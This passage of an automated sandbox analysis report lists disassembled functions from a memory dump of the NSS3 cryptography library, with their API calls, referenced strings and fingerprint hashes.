Instruction ID: 51476df2dd60bf8f50d784f868cef523c6daf150cc46fb9f14899fe8d91ecb13
Opcode Fuzzy Hash: e435a07e1ab562da105270ea77a23b59281fbe3d8896d74d6dc7e401d4539fa1
Instruction Fuzzy Hash: 93F0C2B5201A01A7DA209F68A848917777CBE866787104328F23E83980D731F036C7D1

Function 6CC36C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CC36D36

Strings

database corruption, xrefs: 6CC36D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC36D20
%s at line %d of [%.10s], xrefs: 6CC36D2F

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: a5ee086956bfb744b9b5049800f16899c6cfa86b1ba93a531e9645959e2835da
Instruction ID: 935bb0245f5a48cbda7cc712b9996982599540aca73ccff11d4e32d5c62beada
Opcode Fuzzy Hash: a5ee086956bfb744b9b5049800f16899c6cfa86b1ba93a531e9645959e2835da
Instruction Fuzzy Hash: 85210030A00B159BC3118F1AE841B9AB7F6BF84308F14856CD88D9BF51F770F9498792

Function 6CD6CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CD6CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CD6CC7B), ref: 6CD6CD7A
Part of subcall function 6CD6CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CD6CD8E
Part of subcall function 6CD6CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CD6CDA5
Part of subcall function 6CD6CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CD6CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CD6CCB5
memcpy.VCRUNTIME140(6CE014F4,6CE002AC,00000090), ref: 6CD6CCD3
memcpy.VCRUNTIME140(6CE01588,6CE002AC,00000090), ref: 6CD6CD2B

Part of subcall function 6CC89AC0: socket.WSOCK32(?,00000017,6CC899BE), ref: 6CC89AE6
Part of subcall function 6CC89AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CC899BE), ref: 6CC89AFC

Part of subcall function 6CC90590: closesocket.WSOCK32(6CC89A8F,?,?,6CC89A8F,00000000), ref: 6CC90597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6CD6CCB0

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: dd9608eeec5b1dd91800542731b6472d28119910fff764aa2eb4e9a4a4c1cfad
Instruction ID: fcf2abf078101b900c71ddc62fc3cc184a987c6a1744d51e643c69f0dbf10594
Opcode Fuzzy Hash: dd9608eeec5b1dd91800542731b6472d28119910fff764aa2eb4e9a4a4c1cfad
Instruction Fuzzy Hash: 51111FF2B002809FDB009FDA98467463AB8975671CF14152DE50BAFB61E772D4248BD6

Function 6CD64FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6CC485D2,00000000,?,?), ref: 6CD64FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD6500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD650C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD650D6

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 98dc0f48c6cfcfd747da0c990a65330a7a58312c3707c671a5931b032b6f75da
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: AE4182B2A002118BCB18CF19DCD179AB7E1BF44318B1D46ADD84ACBB12F775E891CB91

Function 6CD1CF00 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CD1D01E

Part of subcall function 6CCEE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CCEE5A0

PK11_FreeSymKey.NSS3(00000000), ref: 6CD1D055

Part of subcall function 6CCEADC0: TlsGetValue.KERNEL32(?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE10
Part of subcall function 6CCEADC0: EnterCriticalSection.KERNEL32(?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE24
Part of subcall function 6CCEADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CCCD079,00000000,00000001), ref: 6CCEAE5A
Part of subcall function 6CCEADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE6F
Part of subcall function 6CCEADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE7F
Part of subcall function 6CCEADC0: TlsGetValue.KERNEL32(?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAEB1
Part of subcall function 6CCEADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAEC9

PK11_PubUnwrapSymKey.NSS3(?,00000000,6CD1CC55,00000107,00000000), ref: 6CD1D079
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CD1D08C

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: K11_$CriticalEnterErrorSectionValue$DeriveFreeUnlockUnwrapWithfreememset
String ID:
API String ID: 324975836-0
Opcode ID: 4c31d4c2460b99fc1605a7104d0a2fe5a2087c95329c144de419de3431cf1836
Instruction ID: 5762020c80aeac2770cce31b87f82282c127a9c2dbf33de6b4ec0ba3cf9afde0
Opcode Fuzzy Hash: 4c31d4c2460b99fc1605a7104d0a2fe5a2087c95329c144de419de3431cf1836
Instruction Fuzzy Hash: 2C416FB1904219DFE710CF15DC40BA9B7B5FF48308F05869AE94CA7751E371AA86CB91

Function 6CD12C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6CD11289,?), ref: 6CD12D72

Part of subcall function 6CD13390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6CD12CA7,E80C76FF,?,6CD11289,?), ref: 6CD133E9
Part of subcall function 6CD13390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6CD1342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CD11289,?), ref: 6CD12D61

Part of subcall function 6CD10B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CD10B21
Part of subcall function 6CD10B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CD10B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6CD11289,?), ref: 6CD12D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6CD11289,?), ref: 6CD12DAF

Part of subcall function 6CCCB8F0: PR_CallOnceWithArg.NSS3(6CE02178,6CCCBCF0,?), ref: 6CCCB915
Part of subcall function 6CCCB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6CCCB933
Part of subcall function 6CCCB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6CCCB9C8
Part of subcall function 6CCCB8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CCCB9E1

Part of subcall function 6CD10A50: SECOID_GetAlgorithmTag_Util.NSS3(6CD12A90,E8571076,?,6CD12A7C,6CD121F1,?,?,?,00000000,00000000,?,?,6CD121DD,00000000), ref: 6CD10A66

Part of subcall function 6CD13310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6CD12D1E,?,?,?,?,00000000,?,?,?,?,?,6CD11289), ref: 6CD13348

Part of subcall function 6CD106F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6CD12E70,00000000), ref: 6CD10701

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 9aa8bc75293002d0f62f48c9ad8fe25ca6e4c4484ccf5c49309349918b10b910
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: 2A31A4B6904205ABDB009F64FC45BAA3769AF4621DF140120ED159BFB1E732E928C7F2

Function 6CCA6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CCA6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CCA6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CCA6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CDC8FE0), ref: 6CCA6CFE

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: dfd42c2520d715abec43fea7100b8aaf98d1f374d84627df4828ba65561ee63a
Instruction ID: 4b3c70a37bbba7a26c17bb44412880efb88384b08f82eac62895bbe4ce88a93b
Opcode Fuzzy Hash: dfd42c2520d715abec43fea7100b8aaf98d1f374d84627df4828ba65561ee63a
Instruction Fuzzy Hash: 9C317EB5A006169FEB04CFA9C895ABFBBF5EF45348B10442DD905E7750FB319906CBA0

Function 6CDB4F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6CDB4F5D
free.MOZGLUE(?), ref: 6CDB4F74
free.MOZGLUE(?), ref: 6CDB4F82
GetLastError.KERNEL32 ref: 6CDB4F90

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 5260dbd4353199400c32d7be69a029bf4d9c679508c650d48f6a6e6b1fc7c8c7
Instruction ID: efd2b0493b38d3afb24d7f6400effbbb1bfe8931e106e4c29c63e0e83c42ebe8
Opcode Fuzzy Hash: 5260dbd4353199400c32d7be69a029bf4d9c679508c650d48f6a6e6b1fc7c8c7
Instruction Fuzzy Hash: 9E314BB5A002099BEB01CF69DC81BDF73F8FF89358F040225ED66B7681DB34E91486A1

Function 6CD16DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CD16E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD16E57

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CD16E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CD16EAA

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: ac4280f8966059e6a1865009df51c0f59339888bbd1a3672c834f35febf3b58b
Instruction ID: 337f9eb3a6d432e044484323508293803cf3923b9d9b7e10dcf0ebc0e1320127
Opcode Fuzzy Hash: ac4280f8966059e6a1865009df51c0f59339888bbd1a3672c834f35febf3b58b
Instruction Fuzzy Hash: 2031D272618612EFDB141F34EC0439ABBA4EB0131AF10873DD49AD6E60EB31E55ACF91

Function 6CCE4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CCEB60F,00000000), ref: 6CCE5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CCEB60F,00000000), ref: 6CCE501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6CCEB60F,00000000), ref: 6CCE504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6CCEB60F,00000000), ref: 6CCE5064

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 459bd14dfd9644f73c201dcfd64a2369841c442cee7546113fd93d70414a19f3
Instruction ID: 0274c4b6449e5fdacf856f8c690843c2cdc72af1376f2b1e1bd00bdbf322241e
Opcode Fuzzy Hash: 459bd14dfd9644f73c201dcfd64a2369841c442cee7546113fd93d70414a19f3
Instruction Fuzzy Hash: D83139B4A05606CFDB00EF68D48466ABBF4FF49304F108929E959D7B01E730E895CBD1

Function 6CD12DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CD12E08

Part of subcall function 6CD014C0: TlsGetValue.KERNEL32 ref: 6CD014E0
Part of subcall function 6CD014C0: EnterCriticalSection.KERNEL32 ref: 6CD014F5
Part of subcall function 6CD014C0: PR_Unlock.NSS3 ref: 6CD0150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CD12E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CD12E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CD12E95

Part of subcall function 6CD01200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CCA88A4,00000000,00000000), ref: 6CD01228
Part of subcall function 6CD01200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CD01238
Part of subcall function 6CD01200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CCA88A4,00000000,00000000), ref: 6CD0124B
Part of subcall function 6CD01200: PR_CallOnce.NSS3(6CE02AA4,6CD012D0,00000000,00000000,00000000,?,6CCA88A4,00000000,00000000), ref: 6CD0125D
Part of subcall function 6CD01200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CD0126F
Part of subcall function 6CD01200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CD01280
Part of subcall function 6CD01200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CD0128E
Part of subcall function 6CD01200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CD0129A
Part of subcall function 6CD01200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CD012A1

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 173d378c0e4370b8cce8771a219b1628681b44d261561f84bb7e2cb4a39ff66c
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: CA212EB1E483458BEB00CF54AD447AB37646F9234CF110269ED085BB62F7B3E694C3A1

Function 6CCCACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CCCACC2

Part of subcall function 6CCA2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CCA2F0A
Part of subcall function 6CCA2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CCA2F1D

Part of subcall function 6CCA2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CCA0A1B,00000000), ref: 6CCA2AF0
Part of subcall function 6CCA2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCA2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CCCAD5E

Part of subcall function 6CCE57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CCAB41E,00000000,00000000,?,00000000,?,6CCAB41E,00000000,00000000,00000001,?), ref: 6CCE57E0
Part of subcall function 6CCE57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CCE5843

CERT_DestroyCertList.NSS3(?), ref: 6CCCAD36

Part of subcall function 6CCA2F50: CERT_DestroyCertificate.NSS3(?), ref: 6CCA2F65
Part of subcall function 6CCA2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CCA2F83

free.MOZGLUE(?), ref: 6CCCAD4F

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 3da95ca26bcb100fe27394ff1e5691056c4dd9507170bad9bf913b8dadaef437
Instruction ID: 2a021cfef5622f9313d8346c5c4703e65e78e38992433468969d8ec96605e2bf
Opcode Fuzzy Hash: 3da95ca26bcb100fe27394ff1e5691056c4dd9507170bad9bf913b8dadaef437
Instruction Fuzzy Hash: 0D21D8B1E002149BEB10DFA5D8095EEB7B4EF49348F054068D80977B11F731AA55CBE2

Function 6CCFECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CCFF0AD,6CCFF150,?,6CCFF150,?,?,?), ref: 6CCFECBA

Part of subcall function 6CD00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CCA87ED,00000800,6CC9EF74,00000000), ref: 6CD01000
Part of subcall function 6CD00FF0: PR_NewLock.NSS3(?,00000800,6CC9EF74,00000000), ref: 6CD01016
Part of subcall function 6CD00FF0: PL_InitArenaPool.NSS3(00000000,security,6CCA87ED,00000008,?,00000800,6CC9EF74,00000000), ref: 6CD0102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CCFECD1

Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD010F3
Part of subcall function 6CD010C0: EnterCriticalSection.KERNEL32(?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0110C
Part of subcall function 6CD010C0: PL_ArenaAllocate.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01141
Part of subcall function 6CD010C0: PR_Unlock.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01182
Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CCFED02

Part of subcall function 6CD010C0: PL_ArenaAllocate.NSS3(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CCFED5A

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

